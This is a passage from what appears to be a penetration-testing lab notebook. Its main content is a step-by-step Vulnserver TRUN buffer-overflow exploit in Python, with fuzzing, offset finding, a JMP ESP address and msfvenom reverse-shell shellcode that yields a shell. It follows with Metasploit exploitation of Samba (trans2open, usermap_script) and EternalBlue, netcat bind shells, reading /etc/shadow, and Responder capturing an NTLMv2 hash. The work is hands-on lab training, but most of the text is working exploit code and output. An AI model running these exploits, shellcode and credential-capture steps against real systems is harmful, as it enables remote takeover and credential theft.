Kali)-[~]$ generic_send_tcp 10.0.2.5 9999 stats.spk 0 0
Killing the processes, as the Vulnserver is still not crashed.
Kali)-[~]$ cat stats.spk
s_readline();
s_string("TRUN ");
s_string_variable("0");
Kali)-[~] $ generic_send_tcp 10.0.2.5 9999 stats.spk 0 0
After this command the Vulnserver has crashed. THe buffer has overflowed to EIP.
FUZZING
kali)-[/home/kali] ~ # cat 1.py
#!/usr/lib/python3
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + buffer))
s.close()
sleep(1)
buffer = buffer + "A"*100
except:
print ("FUZZING crashed with error: %s" % str(len(buffer)))
sys.exit()
kali)-[/home/kali] ~# python 1.py
kali)-[/home/kali]
└─# python 1.py
^CFUZZING crashed with error: 2700
Now we need to control the EIP value to gain root access.
Finding the Offset
Using the metasploit tool pattern
kali)-[/home/kali] ~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
㉿kali)-[/home/kali] ~# cat 2.py
#!/usr/lib/python3
import sys, socket
offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + offset))
s.close()
except:
print ("Error connecting to server" )
sys.exit()
kali)-[/home/kali] ~ # python 2.py
After executing the command, the vulnserver crashjed and the value is updated in EIP
kali)-[/home/kali]─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337
[*] Exact match at offset 2003
Overwriting the EIP
㉿kali)-[/home/kali]─# cat 3.py
#!/usr/lib/python3
import sys, socket
shellcode = "A" * 2003 + "B" * 4
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print ("Error connecting to server" )
sys.exit()
kali)-[/home/kali]─# python 3.py
Finding Bad Characters
https://github.com/cytopia/badcharskali)-[~]─$ cat 3.py
#!/usr/lib/python3
import sys, socket
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
shellcode = "A" * 2003 + "B" * 4 + badchars
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print ("Error connecting to server" )
sys.exit()
kali)-[~]$ python 3.py
Finding the Right Module
Trying to find the memory module which has no memory protections. Using https://github.com/corelan/mona with immunity debugger.
Mona.py file if copied in to immunity debugger folder - this PC - C:\ProgramsFiles(x86)\Immunity Inc\Ummunity Debugger\PyCommands\
kali)-[~]─# locate nasm_shell
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
kali)-[~]─# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
nasm > exit
Now on the immunity debugger, searching the code !mona find -s "\xff\xe4" -m essfunc.dll
Here the 625011af is the value got from above search and writing in reverse order which is the syntax format - "\xaf\x11\x50\x62"
kali)-[~]─$ cat 3.py
#!/usr/lib/python3
import sys, socket
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print ("Error connecting to server" )
sys.exit()
kali)-[~]─$
Now finding the 625011af in immunity debugger
Now executing the code in kali
kali)-[~]─$ sudo gedit 3.py
Generating Shellcode and Gaining Root
Generating shell code
Here the Lhost is kali linux machine and -a is architecture and -b is the bad characters.
kali)-[~]─# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
the \x90 * 32 is adding padding or space after the EIP, to make sure the overflow command works
kali)-[~]─$ cat 3.py
#!/usr/lib/python3
import sys, socket
overflow = ("\xd9\xc2\xd9\x74\x24\xf4\x58\xba\x3f\x77\x1b\xfa\x33\xc9"
"\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\x6f\x64\xf9\x0f\x73"
"\x62\x7f\xef\x8b\x73\xe0\x79\x6e\x42\x20\x1d\xfb\xf5\x90"
"\x55\xa9\xf9\x5b\x3b\x59\x89\x2e\x94\x6e\x3a\x84\xc2\x41"
"\xbb\xb5\x37\xc0\x3f\xc4\x6b\x22\x01\x07\x7e\x23\x46\x7a"
"\x73\x71\x1f\xf0\x26\x65\x14\x4c\xfb\x0e\x66\x40\x7b\xf3"
"\x3f\x63\xaa\xa2\x34\x3a\x6c\x45\x98\x36\x25\x5d\xfd\x73"
"\xff\xd6\x35\x0f\xfe\x3e\x04\xf0\xad\x7f\xa8\x03\xaf\xb8"
"\x0f\xfc\xda\xb0\x73\x81\xdc\x07\x09\x5d\x68\x93\xa9\x16"
"\xca\x7f\x4b\xfa\x8d\xf4\x47\xb7\xda\x52\x44\x46\x0e\xe9"
"\x70\xc3\xb1\x3d\xf1\x97\x95\x99\x59\x43\xb7\xb8\x07\x22"
"\xc8\xda\xe7\x9b\x6c\x91\x0a\xcf\x1c\xf8\x42\x3c\x2d\x02"
"\x93\x2a\x26\x71\xa1\xf5\x9c\x1d\x89\x7e\x3b\xda\xee\x54"
"\xfb\x74\x11\x57\xfc\x5d\xd6\x03\xac\xf5\xff\x2b\x27\x05"
"\xff\xf9\xe8\x55\xaf\x51\x49\x05\x0f\x02\x21\x4f\x80\x7d"
"\x51\x70\x4a\x16\xf8\x8b\x1d\x13\xfd\x91\xdb\x4b\xff\x95"
"\xf2\xd7\x76\x73\x9e\xf7\xde\x2c\x37\x61\x7b\xa6\xa6\x6e"
"\x51\xc3\xe9\xe5\x56\x34\xa7\x0d\x12\x26\x50\xfe\x69\x14"
"\xf7\x01\x44\x30\x9b\x90\x03\xc0\xd2\x88\x9b\x97\xb3\x7f"
"\xd2\x7d\x2e\xd9\x4c\x63\xb3\xbf\xb7\x27\x68\x7c\x39\xa6"
"\xfd\x38\x1d\xb8\x3b\xc0\x19\xec\x93\x97\xf7\x5a\x52\x4e"
"\xb6\x34\x0c\x3d\x10\xd0\xc9\x0d\xa3\xa6\xd5\x5b\x55\x46"
"\x67\x32\x20\x79\x48\xd2\xa4\x02\xb4\x42\x4a\xd9\x7c\x62"
"\xa9\xcb\x88\x0b\x74\x9e\x30\x56\x87\x75\x76\x6f\x04\x7f"
"\x07\x94\x14\x0a\x02\xd0\x92\xe7\x7e\x49\x77\x07\x2c\x6a"
"\x52")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.2.5',9999))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print ("Error connecting to server" )
sys.exit()
kali)-[~]─$
Another window opening listen command.
kali)-[~]─$ nc -nvlp 4444
listening on [any] 4444 ...
Executing the python code:
kali)-[~]─$ python 3.py
After the 3.py execution, the root access is achieved, the same can be seen in the listening port window.
kali)-[~]─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.0.2.6] from (UNKNOWN) [10.0.2.5] 49926
Microsoft Windows [Version 10.0.19045.2604]
(c) Microsoft Corporation. All rights reserved.
C:\Users\fcastle\Downloads\vulnserver-master\vulnserver-master>whoami
whoami
marvel\administrator
C:\Users\fcastle\Downloads\vulnserver-master\vulnserver-master>
HANDS ON EXPERIENCE
************************************************************************************
01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
Taking any active machine
Scanning for the ip address of the HTB
Nmap -sU T4 10.10.10.133 #this is udp scan
Nmap -T4 -p- 10.10.10.133 # this is tcp scan
Inference - when the results show 22/tcp & 80/tcp find some sort of exploit that leads to credentials. That credentials will lead to login at port 22
Also chance for getting remote exploitation on port 80
Pasting on the browser 10.10.10.133 leads to openpage
Viewing page source
Page source information show - http://onetwoseven.htb:60080
Changing localDNS, such that the page can be accessed when visiting http://onetwoseven.htb:60080
root@kali:~#Gedit /etc/hosts
Adding the ip address and http://onetwoseven.htb:60080
Now entering http://onetwoseven.htb
root@kali:~# nikto -h onetwoseven.htb
Results - server apache 2.4.5
Server leaks via etags
root@kali:~# sftp ots-5MmY2Y@onetwoseven.htb
Noe after posting the password , accessed is gained
sftp> ls
sftp> get index.html
root@kali:~# cat index.html
Based on the information getting into the url http://onetwoseven.htb/dist/img
root@kali:~# gedit index.html
Changing the image to donkey-ddos-jpg
sftp> put index.html
Recheck the url , now donkey image is displayed
root@kali:~# dirbuster
Target url 192.168.202.130
File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
Select any file - for time being use- directory-list-lowercase-2-3-small.txt
File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
Exploitation, Shells, Credential stuffing
Netcat Reverse shell
Target machine to Attackbox
Netcat Bind shell
Attackbox connected to Target machine
From Victim machine 4445 is opened:
root@kali:~# nc -lvp 4445 -e /bin/bash
From attacker machine :
root@kali:~# nc 192.168.202.129 4445
Connection is established and able to connect to the shell
Apache 1.3.20 vulnerabilities
Apache 1.3.20 vulnerabilities can be executed using Burp suite, leaking Etags, OpenSSL/0.9, mod_ssl/2/8.4 are vul, some directories found.
- root@kali:~# curl --head 192.168.202.130
- Now taking a note
- Server header info disclosure(low)
- 192.168.202.130 : Copy IP address and paste screenshot
- Default 404 info disclosure (low)
- 192.168.202.130/asdewgfnk : Copy IP address and paste screenshot
- root@kali:~# nmap –script=ssl-enum-ciphers -p 443 192.168.202.130
- Now taking a note
- Weak Ciphers
- 192.168.202.130 : Copy IP address and paste screenshot :- least strength F
- Now search for Apache 1.3.20 vulnerabilities on web
- Exploit Database https://www.exploit-db.com/
- root@kali:~# searchsploit apache
- Now trying to get more information on Port 139 open Samba smdb
- root@kali:~# smbclient -L \\\\192.168.202.130
- root@kali:~# smbclient -L \\\\192.168.202.130\\IPC$
- NESSUS scan report vulnerability - SMB Signing not required shown as vul.
- Now root@kali:~# msfconsole
- msf5> search smb
- msf5> use auxiliary/scanner/smb/smb_version
- msf5 auxiliary(scanner/smb/smb_version) > options
- msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
- msf5 auxiliary(scanner/smb/smb_version) > run
- root@kali:~# searchsploit samba 2.2
- There are more trans2open exploits
- msf5 auxiliary(scanner/smb/smb_version) > search trans2open
- msf5 auxiliary(scanner/smb/smb_version) > info exploit/linux/samba/trans2open
Now Continuation from earlier Apache searching the web for OPENLUCK vulnerabilities
root@kali:~# git clone https://github.com/heltonWernik/OpenLuck
Install ssl-dev library
apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
./OpenFuck
/OpenFuck 0x6b 192.168.202.130 -c 40
After running the exploit the root privilege is gained
Now Trying to enumerate from the root using below commands
Arp -a
Route
Sudo -l
Pwd # working directory
Trying to get password hashes
Cat /etc/shadow
Trying here to find some other connected sub networks using the above commands also.
Now root@kali:~# msfconsole
msf5>
msf5> search smb
msf5> use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
msf5 auxiliary(scanner/smb/smb_version) > run
Searching for samba 2.2.1a exploit on google
msf5 auxiliary(scanner/smb/smb_version) > search trans2open
msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open
Msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.202.130
msf5 exploit(linux/samba/trans2open) > info
msf5 exploit(linux/samba/trans2open) > run
msf5 exploit(linux/samba/trans2open) > ^C # here there no no connection or exploit not working, hence looking for other options
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
This is the non staged payload where is he no /slash
For Staged payload there is / after shell
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > run
It was success and root access is achieved
Now connecting to HackTheBox HTB
Retired machine - Lame - 10.10.10.3
root@kali :~ # nmap -T4 -p- -A 10.10.10.3
22/tcp open ssh : When SSH is open brute force can be tried to open
139, 445 - netbios samba 3.0.20-Debian
root@kali :~ # ftp 10.10.10.3
Username and password :- anonymous
ftp > help
ftp> ls
Checking for exploit :- vsftpd 2.3.4 on google
Checking for exploit : - smbd 3.0.20 on google - got some info on username map script
Opening metasploit to search for username map script
Now root@kali:~# msfconsole
msf5>search usermap
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
cat /etc/shadow/
arp -a
route
Check all the files to see for important data and CTF - catch the flag required to search all the files to find the CTF
****************************************************************************
02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
Downloading ISO image from Microsoft
https://www.microsoft.com/en-us/evalcenter/download-windows-10-enterprise
https://www.microsoft.com/en-gb/evalcenter/download-windows-server-2016
Setting up the VM installation:
For both the machines & Kali - set network to NATnetwork
WIN 2016 SERVER
- While setting up 2016 server, go to setting and remove the floppy drive component
- Setting up compromised password :- Admin : Password1
- PC to be discoverable = Yes
- Configure this local server
- Add roles & features
- Role based,next & next
- Active directory domain service - add features
- Next, next, install- close
- Click on the flag - Promote this server domain controller
- Add new forest
- Setting up compromised password :- Admin : Pass$123
- Next,next,next,next,install, after reboot
- Tools p Active directory Users and computers
- Marvel.local - users- rgt Click- new user.
- CMD -ipconfig
- After adding fcastle to domain
- Server manager - Files shares and services - shares
- Top right- Tasks- New share - SMB share quick- click next
- select custom folder- then folder created, next, then, select enable access-based enumeration
- Next, then click create
WIN 2010 ENTERPRISE
- Domain join instead
- Just name localfrank/Password2, next-
- Skip cortna
- Uncheck all then accept
- Rename the PC
- Network & internet settings :- change adaptor settings -properties - double click internet protocol version4 -
- Use the following DNS server address - copy the IP address from win 2016 serv
- Search domain - click connect -
- Join the domain - marvel.local
- fcastle/std user
- After creating share folder, mapping the folder
- Under mypc - then- computer options- map the drive - \\HYDRA\hackme.
Attack to be performed - LLMNR/NBT-NS poisoning
┌──(root㉿kali)-[/usr/share/responder]
└─# python3 Responder.py -I eth0 -dw
Win10:- The ip address of the Kali on the folder address bar : 10.0.2.6
Output on (root㉿kali) -
[SMB] NTLMv2-SSP Client : 10.0.2.5
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash : fcastle::MARVEL:b21d516efae94724:A6D0581483609456B43CEE7C82B37E82:0101000000000000002CE8DF1F4DD901E32465EF4342A6F600000000020008004A0035003700450001001E00570049004E002D0038003200420055003600350052005300530033004F0004003400570049004E002D0038003200420055003600350052005300530033004F002E004A003500370045002E004C004F00430041004C00030014004A003500370045002E004C004F00430041004C00050014004A003500370045002E004C004F00430041004C0007000800002CE8DF1F4DD901060004000200000008003000300000000000000000000000002000008F2B9C4D6C9E4FC9F2090A3CF23E6A2AA75EAD2929F61874FA50FE2C82DE3CD60A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0032002E0036000000000000000000
Hash data is captured
These tests can be done against the default credentials for the IOT devices - like printers which has SMB share.
************************************************************************************
03 - VULNERABLE MACHINE : BLUE
 |
| BLUE Vlun Machine |
kali)-[~] └─$ sudo nmap -F -A -T4 10.0.2.7
Nmap scan report for 10.0.2.7
Host is up (0.00082s latency).
Not shown: 92 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
(kali㉿kali)-[~]
└─$ sudo nmap --script vuln 10.0.2.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:55 EDT
Nmap scan report for 10.0.2.7
Host is up (0.0022s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 110.60 seconds
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf6 >use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.2.7
rhost => 10.0.2.7
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.0.2.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.2.7:445 - Host is likely VULNERABLE to MS17-010! - W
[*] 10.0.2.7:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.2.7:445 - The target is vulnerable.
 |
| meterpreter/reverse_tcp |
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost eth0
lhost => 10.0.2.15
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.0.2.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.2.7:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.2.7:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.2.7:445 - The target is vulnerable.
[*] 10.0.2.7:445 - Connecting to target for exploitation.
[+] 10.0.2.7:445 - Connection established for exploitation.
[+] 10.0.2.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.2.7:445 - CORE raw buffer dump (38 bytes)
[*] 10.0.2.7:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.0.2.7:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.0.2.7:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.0.2.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.2.7:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.2.7:445 - Sending all but last fragment of exploit packet
[*] 10.0.2.7:445 - Starting non-paged pool grooming
[+] 10.0.2.7:445 - Sending SMBv2 buffers
[+] 10.0.2.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.2.7:445 - Sending final SMBv2 buffers.
[*] 10.0.2.7:445 - Sending last fragment of exploit packet!
[*] 10.0.2.7:445 - Receiving response from exploit packet
[+] 10.0.2.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.2.7:445 - Sending egg to corrupted connection.
